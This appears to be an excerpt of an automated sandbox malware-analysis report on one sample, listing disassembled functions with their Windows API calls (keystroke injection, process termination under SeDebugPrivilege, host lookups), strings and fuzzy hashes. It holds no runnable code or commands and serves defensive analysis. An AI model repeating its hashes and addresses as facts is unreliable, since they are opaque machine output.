                                                                    • Instruction Fuzzy Hash: EF317CB1204701AFDB21DFA6DC44A66BBEDFF58312F00441DF96A86611DB34E858ABA0
                                                                    Function 009425A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                      • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                      • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 009425BD
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009425DB
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009425DF
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 009425E9
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00942601
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00942605
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0094260F
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00942623
                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00942627
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
                                                                    • Instruction ID: 4d9cdf693725b0f06d960dfcc256a99f7ea70c7d4a47327737e4355466648742
                                                                    • Opcode Fuzzy Hash: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
                                                                    • Instruction Fuzzy Hash: EE01D871398210BBFB1067689C8AF593F59DF8EB11F500015F318AE0D1C9E11484DA69
                                                                    Function 00941803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00941449,?,?,00000000), ref: 0094180C
                                                                    • HeapAlloc.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941813
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941828
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00941449,?,?,00000000), ref: 00941830
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941833
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941843
                                                                    • GetCurrentProcess.KERNEL32(00941449,00000000,?,00941449,?,?,00000000), ref: 0094184B
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 0094184E
                                                                    • CreateThread.KERNEL32(00000000,00000000,00941874,00000000,00000000,00000000), ref: 00941868
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
                                                                    • Instruction ID: c5b06ff83c779dde5d6ff82a00e3354852451d86fd312557916b897b510eca49
                                                                    • Opcode Fuzzy Hash: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
                                                                    • Instruction Fuzzy Hash: E501BFB6254304FFE710AB65DC4DF573B6CEB89B11F404425FA05DB191CA709840DB20
                                                                    Function 0096A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0094D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
                                                                      • Part of subcall function 0094D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
                                                                      • Part of subcall function 0094D4DC: CloseHandle.KERNEL32(00000000), ref: 0094D5DC
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A16D
                                                                    • GetLastError.KERNEL32 ref: 0096A180
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A1B3
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0096A268
                                                                    • GetLastError.KERNEL32(00000000), ref: 0096A273
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096A2C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
                                                                    • Instruction ID: ee0a297b16cbb9a84607fe3d43ee97921810ef675fdc45366d329401e4758ded
                                                                    • Opcode Fuzzy Hash: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
                                                                    • Instruction Fuzzy Hash: 5F61DE712082429FD320DF19C894F16BBE5AF45318F14849CE46A9B7A3C776EC85CF92
                                                                    Function 00973886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00973925
                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0097393A
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00973954
                                                                    • _wcslen.LIBCMT ref: 00973999
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 009739C6
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009739F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcslen
                                                                    • String ID: SysListView32
                                                                    • API String ID: 2147712094-78025650
                                                                    • Opcode ID: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
                                                                    • Instruction ID: 1d0878cbe4f299e479d267f78d83fe3d328364b0417873eb37236effa4003adb
                                                                    • Opcode Fuzzy Hash: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
                                                                    • Instruction Fuzzy Hash: 4841B472A00219ABDF219F64CC45BEA77A9FF48354F10852AF95CE7281D7719E80DB90
                                                                    Function 0094BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0094BCFD
                                                                    • IsMenu.USER32(00000000), ref: 0094BD1D
                                                                    • CreatePopupMenu.USER32 ref: 0094BD53
                                                                    • GetMenuItemCount.USER32(00BB5748), ref: 0094BDA4
                                                                    • InsertMenuItemW.USER32(00BB5748,?,00000001,00000030), ref: 0094BDCC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                    • String ID: 0$2
                                                                    • API String ID: 93392585-3793063076
                                                                    • Opcode ID: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
                                                                    • Instruction ID: ba3007f53e2314ba00246971bbba066a74d716c06cb4f94aba6ba1f38f157c76
                                                                    • Opcode Fuzzy Hash: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
                                                                    • Instruction Fuzzy Hash: 4451ADB0A042059BDF20CFA8D8C4FAEBBF8BF85314F144699E5559B2D0D770D945CB61
                                                                    Function 0094C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 0094C913
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
                                                                    • Instruction ID: 046ae63edffb9cf5bd845eb527c79688382a1b9dfa0e7f07c4c2fb872752b632
                                                                    • Opcode Fuzzy Hash: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
                                                                    • Instruction Fuzzy Hash: 651150B279A306BEE7046B14DD83DAE379CDF56318B10002EF500A62C2EB745E4053A4
                                                                    Function 0094DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 642191829-3771769585
                                                                    • Opcode ID: 1600525a5812770507289a2b14824dcbaac5deeb2c1d80d0d6362e98de5e600f
                                                                    • Instruction ID: 9b631a888b7d37371317d47efed327b97956fec223ae11711b81650124e19dc1
                                                                    • Opcode Fuzzy Hash: 1600525a5812770507289a2b14824dcbaac5deeb2c1d80d0d6362e98de5e600f
                                                                    • Instruction Fuzzy Hash: 281106B6914104AFCB24AB64DC4AFEF77ACDF51B10F00016DF549AA0D1EF748A819B51
                                                                    Function 0094ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 952045576-0
                                                                    • Opcode ID: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
                                                                    • Instruction ID: 179d6086bdef115768d8ad02057f888e7a71903bd8d0b43763bc46c4571a934d
                                                                    • Opcode Fuzzy Hash: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
                                                                    • Instruction Fuzzy Hash: 76419565C10118B9CB11EBF8C88AECFB7ACAF85710F508462F524E31A1FB34E255C7A5
                                                                    Function 008FF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 008FF953
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F3D1
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F454
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
                                                                    • Instruction ID: 1ba65263f02dc769313b668341015d68cf7a71e19209ae0725908dd7f89dce2f
                                                                    • Opcode Fuzzy Hash: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
                                                                    • Instruction Fuzzy Hash: 7D412831718688BAC7388B39899C73A7F95FF56314F54443CE38BD2672D6B2A880DB11
                                                                    Function 00972D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00972D1B
                                                                    • GetDC.USER32(00000000), ref: 00972D23
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00972D2E
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00972D3A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00972D76
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00972D87
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00975A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00972DC2
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00972DE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
                                                                    • Instruction ID: a788378a3a4594d6f91e43b24cc000862beed55d3b20706040d133286b87aaca
                                                                    • Opcode Fuzzy Hash: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
                                                                    • Instruction Fuzzy Hash: 8B317F72215214BFEB214F50CC89FEB3BADEF09715F044059FE0C9A291D6759C90C7A4
                                                                    Function 00945622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
                                                                    • Instruction ID: bd64fa21f1438fefc0509db32ba4cdffd49c168e15fe990b3c2c7d03085d6bf7
                                                                    • Opcode Fuzzy Hash: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
                                                                    • Instruction Fuzzy Hash: EA21C672640A097BD61956608E92FFA339CBFA1788F564030FD08AA683F725ED11C5A9
                                                                    Function 00964FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 68dbde534afeebe13de9d5059085f15bb62c6c73dc5cafd1375016e65c764644
                                                                    • Instruction ID: 36aa3f599022bb9879afecbc62a5d84ac0b86a8355c7057b9fdbe3ed28537f72
                                                                    • Opcode Fuzzy Hash: 68dbde534afeebe13de9d5059085f15bb62c6c73dc5cafd1375016e65c764644
                                                                    • Instruction Fuzzy Hash: F1D1A471A0060AAFDF10CF98C891FAEB7B9FF88344F168469E915AB281E771DD45CB50
                                                                    Function 00921522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?), ref: 009215CE
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00921651
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009216E4
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009216FB
                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00921777
                                                                    • __freea.LIBCMT ref: 009217A2
                                                                    • __freea.LIBCMT ref: 009217AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                    • String ID:
                                                                    • API String ID: 2829977744-0
                                                                    • Opcode ID: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
                                                                    • Instruction ID: e215617854fcbb395f20b45de2674414e2bb13b04f77c8e707a7c0c34ab2e5ba
                                                                    • Opcode Fuzzy Hash: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
                                                                    • Instruction Fuzzy Hash: 6091D672E002269EDF208E74E841EEE7BBD9FA5310F184569F805E7149D735CD90CBA0
                                                                    Function 00964523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2610073882-625585964
                                                                    • Opcode ID: 0d6057d109eb2462feef127173543f70833257d2d9bb8dccd3b6d8a262d64989
                                                                    • Instruction ID: b673fc7c8a87323104c8f1637fe6281ea626306de1b5a1c17b21b0294b4c4b10
                                                                    • Opcode Fuzzy Hash: 0d6057d109eb2462feef127173543f70833257d2d9bb8dccd3b6d8a262d64989
                                                                    • Instruction Fuzzy Hash: 61917971A00219AFDF20CFA5CC89FAEBBB8EF86714F108559F515AB280D7709945CFA0
                                                                    Function 00951187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0095125C
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00951284
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009512A8
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009512D8
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0095135F
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009513C4
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00951430
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
